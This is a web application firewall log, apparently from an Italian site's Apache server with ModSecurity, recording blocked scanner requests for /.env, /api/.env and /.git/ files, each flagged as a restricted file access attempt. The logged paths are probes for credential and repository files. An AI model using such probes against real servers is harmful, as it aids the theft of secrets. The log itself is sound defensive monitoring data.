[Wed Nov 20 22:01:43.009621 2024] [:error] [pid 3432508] [client 207.180.213.68:51208] [client 207.180.213.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zz5ON_1WQWOOTUAxsO_9XwAAAAA"]
[Wed Nov 20 22:01:43.010155 2024] [:error] [pid 3432508] [client 207.180.213.68:51208] [client 207.180.213.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zz5ON_1WQWOOTUAxsO_9XwAAAAA"]
[Wed Nov 20 22:01:43.010466 2024] [:error] [pid 3432508] [client 207.180.213.68:51208] [client 207.180.213.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zz5ON_1WQWOOTUAxsO_9XwAAAAA"]
[Sat Nov 23 01:24:09.409782 2024] [:error] [pid 3497074] [client 45.148.10.206:36652] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0EgqW_5RwEvYj7kdpUbtQAAAAc"]
[Sat Nov 23 01:24:09.411518 2024] [:error] [pid 3497074] [client 45.148.10.206:36652] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0EgqW_5RwEvYj7kdpUbtQAAAAc"]
[Sat Nov 23 01:24:09.411963 2024] [:error] [pid 3497074] [client 45.148.10.206:36652] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0EgqW_5RwEvYj7kdpUbtQAAAAc"]
[Sat Nov 23 01:24:13.484468 2024] [:error] [pid 3497106] [client 45.148.10.206:38744] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z0EgrbscfpmcksFgC5A3kgAAAAU"]
[Sat Nov 23 01:24:13.484825 2024] [:error] [pid 3497106] [client 45.148.10.206:38744] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z0EgrbscfpmcksFgC5A3kgAAAAU"]
[Sat Nov 23 01:24:13.485059 2024] [:error] [pid 3497106] [client 45.148.10.206:38744] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z0EgrbscfpmcksFgC5A3kgAAAAU"]
[Tue Nov 26 08:27:53.875895 2024] [:error] [pid 3564711] [client 31.220.40.210:58092] [client 31.220.40.210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0V4eRF8ID7EKZVH1cUGsQAAAAI"]
[Tue Nov 26 08:27:53.877664 2024] [:error] [pid 3564711] [client 31.220.40.210:58092] [client 31.220.40.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0V4eRF8ID7EKZVH1cUGsQAAAAI"]
[Tue Nov 26 08:27:53.878030 2024] [:error] [pid 3564711] [client 31.220.40.210:58092] [client 31.220.40.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0V4eRF8ID7EKZVH1cUGsQAAAAI"]
[Wed Nov 27 03:56:58.540991 2024] [:error] [pid 3586429] [client 154.216.19.170:63077] [client 154.216.19.170] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0aKemogcvydD68HJU7MeAAAAAE"]
[Wed Nov 27 03:56:58.541376 2024] [:error] [pid 3586429] [client 154.216.19.170:63077] [client 154.216.19.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0aKemogcvydD68HJU7MeAAAAAE"]
[Wed Nov 27 03:56:58.541609 2024] [:error] [pid 3586429] [client 154.216.19.170:63077] [client 154.216.19.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z0aKemogcvydD68HJU7MeAAAAAE"]
[Sun Dec 01 04:07:47.027173 2024] [:error] [pid 3676102] [client 35.160.43.194:54834] [client 35.160.43.194] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z0vTAyruwevJK6uX-rrZRQAAAAA"]
[Sun Dec 01 04:07:47.028432 2024] [:error] [pid 3676102] [client 35.160.43.194:54834] [client 35.160.43.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z0vTAyruwevJK6uX-rrZRQAAAAA"]
[Sun Dec 01 04:07:47.028658 2024] [:error] [pid 3676102] [client 35.160.43.194:54834] [client 35.160.43.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z0vTAyruwevJK6uX-rrZRQAAAAA"]
[Sun Dec 01 06:11:29.384702 2024] [:error] [pid 3676104] [client 3.88.34.51:41720] [client 3.88.34.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z0vwAR2UO8AhrtBpby1tLAAAAAQ"]
[Sun Dec 01 06:11:29.385762 2024] [:error] [pid 3676104] [client 3.88.34.51:41720] [client 3.88.34.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z0vwAR2UO8AhrtBpby1tLAAAAAQ"]
[Sun Dec 01 06:11:29.386227 2024] [:error] [pid 3676104] [client 3.88.34.51:41720] [client 3.88.34.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z0vwAR2UO8AhrtBpby1tLAAAAAQ"]
[Mon Dec 02 00:59:24.751940 2024] [:error] [pid 3693210] [client 54.94.94.138:45522] [client 54.94.94.138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z0z4XPPd7lDySwF9p_vChQAAAAE"]
[Mon Dec 02 00:59:24.752651 2024] [:error] [pid 3693210] [client 54.94.94.138:45522] [client 54.94.94.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z0z4XPPd7lDySwF9p_vChQAAAAE"]
[Mon Dec 02 00:59:24.753146 2024] [:error] [pid 3693210] [client 54.94.94.138:45522] [client 54.94.94.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z0z4XPPd7lDySwF9p_vChQAAAAE"]
[Mon Dec 02 01:38:53.756545 2024] [:error] [pid 3693177] [client 18.185.124.68:55166] [client 18.185.124.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z00BnXZ-F9iaTkh2gri4QwAAAAk"]
[Mon Dec 02 01:38:53.756863 2024] [:error] [pid 3693177] [client 18.185.124.68:55166] [client 18.185.124.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z00BnXZ-F9iaTkh2gri4QwAAAAk"]
[Mon Dec 02 01:38:53.757069 2024] [:error] [pid 3693177] [client 18.185.124.68:55166] [client 18.185.124.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z00BnXZ-F9iaTkh2gri4QwAAAAk"]
[Tue Dec 03 01:03:18.013587 2024] [:error] [pid 3716024] [client 54.198.97.180:38810] [client 54.198.97.180] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z05Kxuqgil7lPNlfxR--mQAAAAA"]
[Tue Dec 03 01:03:18.014323 2024] [:error] [pid 3716024] [client 54.198.97.180:38810] [client 54.198.97.180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z05Kxuqgil7lPNlfxR--mQAAAAA"]
[Tue Dec 03 01:03:18.014816 2024] [:error] [pid 3716024] [client 54.198.97.180:38810] [client 54.198.97.180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z05Kxuqgil7lPNlfxR--mQAAAAA"]
[Tue Dec 03 01:03:18.335875 2024] [:error] [pid 3716013] [client 54.198.97.180:38812] [client 54.198.97.180] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z05KxmI6nv8jaB9gaAQ8hwAAABE"]
[Tue Dec 03 01:03:18.336318 2024] [:error] [pid 3716013] [client 54.198.97.180:38812] [client 54.198.97.180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z05KxmI6nv8jaB9gaAQ8hwAAABE"]
[Tue Dec 03 01:03:18.336686 2024] [:error] [pid 3716013] [client 54.198.97.180:38812] [client 54.198.97.180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z05KxmI6nv8jaB9gaAQ8hwAAABE"]
[Tue Dec 03 02:24:42.836943 2024] [:error] [pid 3716012] [client 54.198.97.180:52146] [client 54.198.97.180] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z05d2rXHlcWXl28vIQslYgAAAAU"]
[Tue Dec 03 02:24:42.837593 2024] [:error] [pid 3716012] [client 54.198.97.180:52146] [client 54.198.97.180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z05d2rXHlcWXl28vIQslYgAAAAU"]
[Tue Dec 03 02:24:42.838094 2024] [:error] [pid 3716012] [client 54.198.97.180:52146] [client 54.198.97.180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "Z05d2rXHlcWXl28vIQslYgAAAAU"]
[Tue Dec 03 02:24:43.139731 2024] [:error] [pid 3716013] [client 54.198.97.180:52160] [client 54.198.97.180] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z05d22I6nv8jaB9gaAQ8iwAAABE"]
[Tue Dec 03 02:24:43.140024 2024] [:error] [pid 3716013] [client 54.198.97.180:52160] [client 54.198.97.180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z05d22I6nv8jaB9gaAQ8iwAAABE"]
[Tue Dec 03 02:24:43.140233 2024] [:error] [pid 3716013] [client 54.198.97.180:52160] [client 54.198.97.180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "Z05d22I6nv8jaB9gaAQ8iwAAABE"]
[Thu Dec 05 02:36:33.647711 2024] [:error] [pid 3758047] [client 109.205.213.18:54568] [client 109.205.213.18] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z1EDoV0ZPgA8kNujNh6HcgAAAAQ"]
[Thu Dec 05 02:36:33.649596 2024] [:error] [pid 3758047] [client 109.205.213.18:54568] [client 109.205.213.18] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z1EDoV0ZPgA8kNujNh6HcgAAAAQ"]
